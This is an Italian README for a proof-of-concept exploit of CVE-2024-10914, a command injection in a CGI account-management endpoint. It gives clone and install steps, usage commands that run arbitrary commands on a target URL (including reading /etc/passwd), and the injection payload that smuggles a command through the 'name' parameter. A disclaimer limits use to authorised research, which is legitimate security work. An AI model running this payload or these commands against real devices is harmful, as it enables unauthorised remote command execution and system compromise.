
PoC per sfruttare il CVE-2024-10914
Exploit per vulnerabilità di iniezione di comandi nell'endpoint /cgi-bin/account_mgr.cgi. Questa vulnerabilità permette di eseguire comandi arbitrari sul sistema affetto attraverso parametri non sanitizzati.
CVE-2024-10914 è una vulnerabilità di iniezione di comandi che colpisce dispositivi con interfaccia web CGI. L'applicazione vulnerabile non convalida correttamente il parametro name nella richiesta cgi_user_add, permettendo a un attaccante di iniettare comandi di sistema che verranno eseguiti con i privilegi dell'applicazione.
Clona il repository e installa le dipendenze:
git clone https://github.com/0xSS3K/CVE-2024-10914__POC.git
cd CVE-2024-10914__POC
pip install -r requirements.txt
Oppure installa manualmente:
pip install requests
Lo script fornisce due argomenti:
python CVE-2024-10914_EXPLOIT.py -u <URL> -c <COMANDO>
-u, --url (richiesto): URL del bersaglio (esempio: http://192.168.1.1)-c, --command (opzionale): Comando da eseguire (default: id)Eseguire il comando id:
python CVE-2024-10914_EXPLOIT.py -u http://192.168.1.1
Eseguire un comando personalizzato:
python CVE-2024-10914_EXPLOIT.py -u http://192.168.1.1 -c "cat /etc/passwd"
Elencare i file:
python CVE-2024-10914_EXPLOIT.py -u http://192.168.1.1 -c "ls -la /tmp"
L'exploit invia una richiesta GET all'endpoint vulnerabile con il seguente payload:
/cgi-bin/account_mgr.cgi?cmd=cgi_user_add&name="; <COMANDO>; "
La stringa vuota viene chiusa con virgolette e si inietta il comando desiderato, che viene eseguito nel contesto del server.
Lo script mostrerà:
Questo codice è fornito esclusivamente a scopo educativo e di ricerca sulla sicurezza. Deve essere utilizzato solo su sistemi di cui si possiede esplicita autorizzazione. L'uso non autorizzato di questo exploit può violare leggi locali e costituire reato. L'autore non si assume responsabilità per l'uso improprio di questo strumento.
SS3K
Non specificata